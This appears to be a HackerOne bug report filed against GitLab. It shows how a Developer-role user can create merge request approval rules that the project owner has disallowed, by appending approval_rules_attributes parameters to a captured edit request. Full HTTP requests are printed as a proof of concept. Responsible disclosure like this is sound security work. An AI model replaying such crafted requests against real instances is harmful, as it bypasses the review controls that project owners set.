Skip to content

Override approvers and approvals required per merge request despite no permissions

HackerOne report #544756 by ashish_r_padelkar on 2019-04-21, assigned to estrike:

Summary

Hello,

Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings

Screenshot_2019-04-22_at_00.28.49.png

However, Developer users can still create new approval rules per merge request!

Steps to reproduce

  1. As a project owner , set a settings like below for merge request approval rule

Screenshot_2019-04-22_at_00.28.49.png

  1. As a Developer user in a project, go to any merge request and EDIT it. once it reloads, you see that you can not EDIT or Create new approval rules.

  2. Without doing anything else, just click on save and capture the below request

POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=  
  1. Append below parameters in the above request
&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1

Where as 3148078 is my user ID, you may try adding yours if mine doesnt work for you.

  1. So the final request would be like
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 542  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1  
  1. Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.

  2. Now you should see the approval rule created despite it was not allowed by owners!
    Screenshot_2019-04-22_at_00.31.04.png

What is the current bug behavior?

Developer can override the merge request approval rules despite settings by owner!

What is the expected correct behavior?

Developer should not be allowed to create approval rule when owner isnt allowing to create

Output of checks

This bug happens on GitLab.com and probably on omnibus installations too!

Regards,
Ashish

Impact

Developers can override approval rule settings

Attachments

Warning: Attachments received through HackerOne, please exercise caution!